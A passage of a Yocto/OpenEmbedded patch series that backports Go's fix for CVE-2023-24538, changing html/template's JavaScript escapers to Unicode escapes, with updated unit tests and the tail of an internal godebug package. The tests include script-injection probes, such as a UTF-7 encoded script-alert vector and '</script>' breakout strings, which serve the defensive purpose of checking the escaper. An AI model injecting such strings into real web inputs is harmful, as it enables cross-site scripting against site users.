+diff --git a/src/internal/godebug/godebug.go b/src/internal/godebug/godebug.go
+new file mode 100644
+index 0000000..ac434e5
+--- /dev/null
++++ b/src/internal/godebug/godebug.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++// Package godebug parses the GODEBUG environment variable.
++package godebug
++
++import "os"
++
++// Get returns the value for the provided GODEBUG key.
++func Get(key string) string {
++ return get(os.Getenv("GODEBUG"), key)
++}
++
++// get returns the value part of key=value in s (a GODEBUG value).
++func get(s, key string) string {
++ for i := 0; i < len(s)-len(key)-1; i++ {
++ if i > 0 && s[i-1] != ',' {
++ continue
++ }
++ afterKey := s[i+len(key):]
++ if afterKey[0] != '=' || s[i:i+len(key)] != key {
++ continue
++ }
++ val := afterKey[1:]
++ for i, b := range val {
++ if b == ',' {
++ return val[:i]
++ }
++ }
++ return val
++ }
++ return ""
++}
+diff --git a/src/internal/godebug/godebug_test.go b/src/internal/godebug/godebug_test.go
+new file mode 100644
+index 0000000..41b9117
+--- /dev/null
++++ b/src/internal/godebug/godebug_test.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package godebug
++
++import "testing"
++
++func TestGet(t *testing.T) {
++ tests := []struct {
++ godebug string
++ key string
++ want string
++ }{
++ {"", "", ""},
++ {"", "foo", ""},
++ {"foo=bar", "foo", "bar"},
++ {"foo=bar,after=x", "foo", "bar"},
++ {"before=x,foo=bar,after=x", "foo", "bar"},
++ {"before=x,foo=bar", "foo", "bar"},
++ {",,,foo=bar,,,", "foo", "bar"},
++ {"foodecoy=wrong,foo=bar", "foo", "bar"},
++ {"foo=", "foo", ""},
++ {"foo", "foo", ""},
++ {",foo", "foo", ""},
++ {"foo=bar,baz", "loooooooong", ""},
++ }
++ for _, tt := range tests {
++ got := get(tt.godebug, tt.key)
++ if got != tt.want {
++ t.Errorf("get(%q, %q) = %q; want %q", tt.godebug, tt.key, got, tt.want)
++ }
++ }
++}
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
new file mode 100644
index 0000000000..f200c41e16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
@@ -0,0 +1,635 @@
+From 6fc21505614f36178df0dad7034b6b8e3f7588d5 Mon Sep 17 00:00:00 2001
+From: empijei <robclap8@gmail.com>
+Date: Fri, 27 Mar 2020 19:27:55 +0100
+Subject: [PATCH 2/6] html/template,text/template: switch to Unicode escapes
+ for JSON compatibility
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The existing implementation is not compatible with JSON
+escape as it uses hex escaping.
+Unicode escape, instead, is valid for both JSON and JS.
+This fix avoids creating a separate escaping context for
+scripts of type "application/ld+json" and it is more
+future-proof in case more JSON+JS contexts get added
+to the platform (e.g. import maps).
+
+Fixes #33671
+Fixes #37634
+
+Change-Id: Id6f6524b4abc52e81d9d744d46bbe5bf2e081543
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226097
+Reviewed-by: Carl Johnson <me@carlmjohnson.net>
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #2
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d4d298040d072ddacea0e0d6b55fb148fff18070
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/content_test.go | 70 +++++++++++++++++++-------------------
+ src/html/template/escape_test.go | 6 ++--
+ src/html/template/example_test.go | 6 ++--
+ src/html/template/js.go | 70 +++++++++++++++++++++++---------------
+ src/html/template/js_test.go | 68 ++++++++++++++++++------------------
+ src/html/template/template_test.go | 39 +++++++++++++++++++++
+ src/text/template/exec_test.go | 6 ++--
+ src/text/template/funcs.go | 8 ++---
+ 8 files changed, 163 insertions(+), 110 deletions(-)
+
+diff --git a/src/html/template/content_test.go b/src/html/template/content_test.go
+index 72d56f5..bd86527 100644
+--- a/src/html/template/content_test.go
++++ b/src/html/template/content_test.go
+@@ -18,7 +18,7 @@ func TestTypedContent(t *testing.T) {
+ HTML(`Hello, <b>World</b> &amp;tc!`),
+ HTMLAttr(` dir="ltr"`),
+ JS(`c && alert("Hello, World!");`),
+- JSStr(`Hello, World & O'Reilly\x21`),
++ JSStr(`Hello, World & O'Reilly\u0021`),
+ URL(`greeting=H%69,&addressee=(World)`),
+ Srcset(`greeting=H%69,&addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`),
+ URL(`,foo/,`),
+@@ -70,7 +70,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, <b>World</b> &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -100,7 +100,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello,&#32;World&#32;&amp;tc!`,
+ `&#32;dir&#61;&#34;ltr&#34;`,
+ `c&#32;&amp;&amp;&#32;alert(&#34;Hello,&#32;World!&#34;);`,
+- `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\x21`,
++ `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\u0021`,
+ `greeting&#61;H%69,&amp;addressee&#61;(World)`,
+ `greeting&#61;H%69,&amp;addressee&#61;(World)&#32;2x,&#32;https://golang.org/favicon.ico&#32;500.5w`,
+ `,foo/,`,
+@@ -115,7 +115,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, World &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -130,7 +130,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, &lt;b&gt;World&lt;/b&gt; &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -146,7 +146,7 @@ func TestTypedContent(t *testing.T) {
+ // Not escaped.
+ `c && alert("Hello, World!");`,
+ // Escape sequence not over-escaped.
+- `"Hello, World & O'Reilly\x21"`,
++ `"Hello, World & O'Reilly\u0021"`,
+ `"greeting=H%69,\u0026addressee=(World)"`,
+ `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+ `",foo/,"`,
+@@ -162,7 +162,7 @@ func TestTypedContent(t *testing.T) {
+ // Not JS escaped but HTML escaped.
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+ // Escape sequence not over-escaped.
+- `&#34;Hello, World &amp; O&#39;Reilly\x21&#34;`,
++ `&#34;Hello, World &amp; O&#39;Reilly\u0021&#34;`,
+ `&#34;greeting=H%69,\u0026addressee=(World)&#34;`,
+ `&#34;greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w&#34;`,
+ `&#34;,foo/,&#34;`,
+@@ -171,30 +171,30 @@ func TestTypedContent(t *testing.T) {
+ {
+ `<script>alert("{{.}}")</script>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+ {
+ `<script type="text/javascript">alert("{{.}}")</script>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+@@ -208,7 +208,7 @@ func TestTypedContent(t *testing.T) {
+ // Not escaped.
+ `c && alert("Hello, World!");`,
+ // Escape sequence not over-escaped.
+- `"Hello, World & O'Reilly\x21"`,
++ `"Hello, World & O'Reilly\u0021"`,
+ `"greeting=H%69,\u0026addressee=(World)"`,
+ `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+ `",foo/,"`,
+@@ -224,7 +224,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, <b>World</b> &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -233,15 +233,15 @@ func TestTypedContent(t *testing.T) {
+ {
+ `<button onclick='alert("{{.}}")'>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+@@ -253,7 +253,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+ `%20dir%3d%22ltr%22`,
+ `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+ // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is done.
+ `greeting=H%69,&amp;addressee=%28World%29`,
+ `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+@@ -268,7 +268,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+ `%20dir%3d%22ltr%22`,
+ `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+ // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is not done.
+ `greeting=H%69,&addressee=%28World%29`,
+ `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index e72a9ba..c709660 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -238,7 +238,7 @@ func TestEscape(t *testing.T) {
+ {
+ "jsStr",
+ "<button onclick='alert(&quot;{{.H}}&quot;)'>",
+- `<button onclick='alert(&quot;\x3cHello\x3e&quot;)'>`,
++ `<button onclick='alert(&quot;\u003cHello\u003e&quot;)'>`,
+ },
+ {
+ "badMarshaler",
+@@ -259,7 +259,7 @@ func TestEscape(t *testing.T) {
+ {
+ "jsRe",
+ `<button onclick='alert(/{{"foo+bar"}}/.test(""))'>`,
+- `<button onclick='alert(/foo\x2bbar/.test(""))'>`,
++ `<button onclick='alert(/foo\u002bbar/.test(""))'>`,
+ },
+ {
+ "jsReBlank",
+@@ -825,7 +825,7 @@ func TestEscapeSet(t *testing.T) {
+ "main": `<button onclick="title='{{template "helper"}}'; ...">{{template "helper"}}</button>`,
+ "helper": `{{11}} of {{"<100>"}}`,
+ },
+- `<button onclick="title='11 of \x3c100\x3e'; ...">11 of &lt;100&gt;</button>`,
++ `<button onclick="title='11 of \u003c100\u003e'; ...">11 of &lt;100&gt;</button>`,
+ },
+ // A non-recursive template that ends in a different context.
+ // helper starts in jsCtxRegexp and ends in jsCtxDivOp.
+diff --git a/src/html/template/example_test.go b/src/html/template/example_test.go
+index 9d965f1..6cf936f 100644
+--- a/src/html/template/example_test.go
++++ b/src/html/template/example_test.go
+@@ -116,9 +116,9 @@ func Example_escape() {
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34;32&lt;tasty@example.com&gt;
+- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+- // \"Fran \x26 Freddie\'s Diner\"32\x3Ctasty@example.com\x3E
++ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++ // \"Fran \u0026 Freddie\'s Diner\"32\u003Ctasty@example.com\u003E
+ // %22Fran+%26+Freddie%27s+Diner%2232%3Ctasty%40example.com%3E
+
+ }
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 0e91458..ea9c183 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -163,7 +163,6 @@ func jsValEscaper(args ...interface{}) string {
+ }
+ // TODO: detect cycles before calling Marshal which loops infinitely on
+ // cyclic data. This may be an unacceptable DoS risk.
+-
+ b, err := json.Marshal(a)
+ if err != nil {
+ // Put a space before comment so that if it is flush against
+@@ -178,8 +177,8 @@ func jsValEscaper(args ...interface{}) string {
+ // TODO: maybe post-process output to prevent it from containing
+ // "<!--", "-->", "<![CDATA[", "]]>", or "</script"
+ // in case custom marshalers produce output containing those.
+-
+- // TODO: Maybe abbreviate \u00ab to \xab to produce more compact output.
++ // Note: Do not use \x escaping to save bytes because it is not JSON compatible and this escaper
++ // supports ld+json content-type.
+ if len(b) == 0 {
+ // In, `x=y/{{.}}*z` a json.Marshaler that produces "" should
+ // not cause the output `x=y/*z`.
+@@ -260,6 +259,8 @@ func replace(s string, replacementTable []string) string {
+ r, w = utf8.DecodeRuneInString(s[i:])
+ var repl string
+ switch {
++ case int(r) < len(lowUnicodeReplacementTable):
++ repl = lowUnicodeReplacementTable[r]
+ case int(r) < len(replacementTable) && replacementTable[r] != "":
+ repl = replacementTable[r]
+ case r == '\u2028':
+@@ -283,67 +284,80 @@ func replace(s string, replacementTable []string) string {
+ return b.String()
+ }
+
++var lowUnicodeReplacementTable = []string{
++ 0: `\u0000`, 1: `\u0001`, 2: `\u0002`, 3: `\u0003`, 4: `\u0004`, 5: `\u0005`, 6: `\u0006`,
++ '\a': `\u0007`,
++ '\b': `\u0008`,
++ '\t': `\t`,
++ '\n': `\n`,
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
++ '\f': `\f`,
++ '\r': `\r`,
++ 0xe: `\u000e`, 0xf: `\u000f`, 0x10: `\u0010`, 0x11: `\u0011`, 0x12: `\u0012`, 0x13: `\u0013`,
++ 0x14: `\u0014`, 0x15: `\u0015`, 0x16: `\u0016`, 0x17: `\u0017`, 0x18: `\u0018`, 0x19: `\u0019`,
++ 0x1a: `\u001a`, 0x1b: `\u001b`, 0x1c: `\u001c`, 0x1d: `\u001d`, 0x1e: `\u001e`, 0x1f: `\u001f`,
++}
++
+ var jsStrReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
+- '&': `\x26`,
+- '\'': `\x27`,
+- '+': `\x2b`,
++ '"': `\u0022`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
++ '+': `\u002b`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ '\\': `\\`,
+ }
+
+ // jsStrNormReplacementTable is like jsStrReplacementTable but does not
+ // overencode existing escapes since this table has no entry for `\`.
+ var jsStrNormReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
+- '&': `\x26`,
+- '\'': `\x27`,
+- '+': `\x2b`,
++ '"': `\u0022`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
++ '+': `\u002b`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ }
+-
+ var jsRegexpReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
++ '"': `\u0022`,
+ '$': `\$`,
+- '&': `\x26`,
+- '\'': `\x27`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
+ '(': `\(`,
+ ')': `\)`,
+ '*': `\*`,
+- '+': `\x2b`,
++ '+': `\u002b`,
+ '-': `\-`,
+ '.': `\.`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ '?': `\?`,
+ '[': `\[`,
+ '\\': `\\`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index 075adaa..d7ee47b 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -137,7 +137,7 @@ func TestJSValEscaper(t *testing.T) {
+ {"foo", `"foo"`},
+ // Newlines.
+ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
+- // "\v" == "v" on IE 6 so use "\x0b" instead.
++ // "\v" == "v" on IE 6 so use "\u000b" instead.
+ {"\t\x0b", `"\t\u000b"`},
+ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+ {[]interface{}{}, "[]"},
+@@ -173,7 +173,7 @@ func TestJSStrEscaper(t *testing.T) {
+ }{
+ {"", ``},
+ {"foo", `foo`},
+- {"\u0000", `\0`},
++ {"\u0000", `\u0000`},
+ {"\t", `\t`},
+ {"\n", `\n`},
+ {"\r", `\r`},
+@@ -183,14 +183,14 @@ func TestJSStrEscaper(t *testing.T) {
+ {"\\n", `\\n`},
+ {"foo\r\nbar", `foo\r\nbar`},
+ // Preserve attribute boundaries.
+- {`"`, `\x22`},
+- {`'`, `\x27`},
++ {`"`, `\u0022`},
++ {`'`, `\u0027`},
+ // Allow embedding in HTML without further escaping.
+- {`&amp;`, `\x26amp;`},
++ {`&amp;`, `\u0026amp;`},
+ // Prevent breaking out of text node and element boundaries.
+- {"</script>", `\x3c\/script\x3e`},
+- {"<![CDATA[", `\x3c![CDATA[`},
+- {"]]>", `]]\x3e`},
++ {"</script>", `\u003c\/script\u003e`},
++ {"<![CDATA[", `\u003c![CDATA[`},
++ {"]]>", `]]\u003e`},
+ // https://dev.w3.org/html5/markup/aria/syntax.html#escaping-text-span
+ // "The text in style, script, title, and textarea elements
+ // must not have an escaping text span start that is not
+@@ -201,11 +201,11 @@ func TestJSStrEscaper(t *testing.T) {
+ // allow regular text content to be interpreted as script
+ // allowing script execution via a combination of a JS string
+ // injection followed by an HTML text injection.
+- {"<!--", `\x3c!--`},
+- {"-->", `--\x3e`},
++ {"<!--", `\u003c!--`},
++ {"-->", `--\u003e`},
+ // From https://code.google.com/p/doctype/wiki/ArticleUtf7
+ {"+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
+- `\x2bADw-script\x2bAD4-alert(1)\x2bADw-\/script\x2bAD4-`,
++ `\u002bADw-script\u002bAD4-alert(1)\u002bADw-\/script\u002bAD4-`,
+ },
+ // Invalid UTF-8 sequence
+ {"foo\xA0bar", "foo\xA0bar"},
+@@ -228,7 +228,7 @@ func TestJSRegexpEscaper(t *testing.T) {
+ }{
+ {"", `(?:)`},
+ {"foo", `foo`},
+- {"\u0000", `\0`},
++ {"\u0000", `\u0000`},
+ {"\t", `\t`},
+ {"\n", `\n`},
+ {"\r", `\r`},
+@@ -238,19 +238,19 @@ func TestJSRegexpEscaper(t *testing.T) {
+ {"\\n", `\\n`},
+ {"foo\r\nbar", `foo\r\nbar`},
+ // Preserve attribute boundaries.
+- {`"`, `\x22`},
+- {`'`, `\x27`},
++ {`"`, `\u0022`},
++ {`'`, `\u0027`},
+ // Allow embedding in HTML without further escaping.
+- {`&amp;`, `\x26amp;`},
++ {`&amp;`, `\u0026amp;`},
+ // Prevent breaking out of text node and element boundaries.
+- {"</script>", `\x3c\/script\x3e`},
+- {"<![CDATA[", `\x3c!\[CDATA\[`},
+- {"]]>", `\]\]\x3e`},
++ {"</script>", `\u003c\/script\u003e`},
++ {"<![CDATA[", `\u003c!\[CDATA\[`},
++ {"]]>", `\]\]\u003e`},
+ // Escaping text spans.
+- {"<!--", `\x3c!\-\-`},
+- {"-->", `\-\-\x3e`},
++ {"<!--", `\u003c!\-\-`},
++ {"-->", `\-\-\u003e`},
+ {"*", `\*`},
+- {"+", `\x2b`},
++ {"+", `\u002b`},
+ {"?", `\?`},
+ {"[](){}", `\[\]\(\)\{\}`},
+ {"$foo|x.y", `\$foo\|x\.y`},
+@@ -284,27 +284,27 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+ {
+ "jsStrEscaper",
+ jsStrEscaper,
+- "\\0\x01\x02\x03\x04\x05\x06\x07" +
+- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+- "\x10\x11\x12\x13\x14\x15\x16\x17" +
+- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+- ` !\x22#$%\x26\x27()*\x2b,-.\/` +
+- `0123456789:;\x3c=\x3e?` +
++ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++ `\u0008\t\n\u000b\f\r\u000e\u000f` +
++ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++ ` !\u0022#$%\u0026\u0027()*\u002b,-.\/` +
++ `0123456789:;\u003c=\u003e?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ[\\]^_` +
+ "`abcdefghijklmno" +
+- "pqrstuvwxyz{|}~\x7f" +
++ "pqrstuvwxyz{|}~\u007f" +
+ "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+ },
+ {
+ "jsRegexpEscaper",
+ jsRegexpEscaper,
+- "\\0\x01\x02\x03\x04\x05\x06\x07" +
+- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+- "\x10\x11\x12\x13\x14\x15\x16\x17" +
+- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+- ` !\x22#\$%\x26\x27\(\)\*\x2b,\-\.\/` +
+- `0123456789:;\x3c=\x3e\?` +
++ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++ `\u0008\t\n\u000b\f\r\u000e\u000f` +
++ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++ ` !\u0022#\$%\u0026\u0027\(\)\*\u002b,\-\.\/` +
++ `0123456789:;\u003c=\u003e\?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ\[\\\]\^_` +
+ "`abcdefghijklmno" +
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 13e6ba4..86bd4db 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -6,6 +6,7 @@ package template_test
+
+ import (
+ "bytes"
++ "encoding/json"
+ . "html/template"
+ "strings"
+ "testing"
+@@ -121,6 +122,44 @@ func TestNumbers(t *testing.T) {
+ c.mustExecute(c.root, nil, "12.34 7.5")
+ }
+
++func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
++ // See #33671 and #37634 for more context on this.
++ tests := []struct{ name, in string }{
++ {"empty", ""},
++ {"invalid", string(rune(-1))},
++ {"null", "\u0000"},
++ {"unit separator", "\u001F"},
++ {"tab", "\t"},
++ {"gt and lt", "<>"},
++ {"quotes", `'"`},
++ {"ASCII letters", "ASCII letters"},
++ {"Unicode", "ʕ⊙ϖ⊙ʔ"},
++ {"Pizza", "P"},
++ }
++ const (
++ prefix = `<script type="application/ld+json">`
++ suffix = `</script>`
++ templ = prefix + `"{{.}}"` + suffix
++ )
++ tpl := Must(New("JS string is JSON string").Parse(templ))
++ for _, tt := range tests {
++ t.Run(tt.name, func(t *testing.T) {
++ var buf bytes.Buffer
++ if err := tpl.Execute(&buf, tt.in); err != nil {
++ t.Fatalf("Cannot render template: %v", err)
++ }
++ trimmed := bytes.TrimSuffix(bytes.TrimPrefix(buf.Bytes(), []byte(prefix)), []byte(suffix))
++ var got string
++ if err := json.Unmarshal(trimmed, &got); err != nil {
++ t.Fatalf("Cannot parse JS string %q as JSON: %v", trimmed[1:len(trimmed)-1], err)
++ }
++ if got != tt.in {
++ t.Errorf("Serialization changed the string value: got %q want %q", got, tt.in)
++ }
++ })
++ }
++}
++
+ type testCase struct {
+ t *testing.T
+ root *Template
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 77294ed..b8a809e 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -911,9 +911,9 @@ func TestJSEscaping(t *testing.T) {
+ {`Go "jump" \`, `Go \"jump\" \\`},
+ {`Yukihiro says "今日は世界"`, `Yukihiro says \"今日は世界\"`},
+ {"unprintable \uFDFF", `unprintable \uFDFF`},
+- {`<html>`, `\x3Chtml\x3E`},
+- {`no = in attributes`, `no \x3D in attributes`},
+- {`&#x27; does not become HTML entity`, `\x26#x27; does not become HTML entity`},
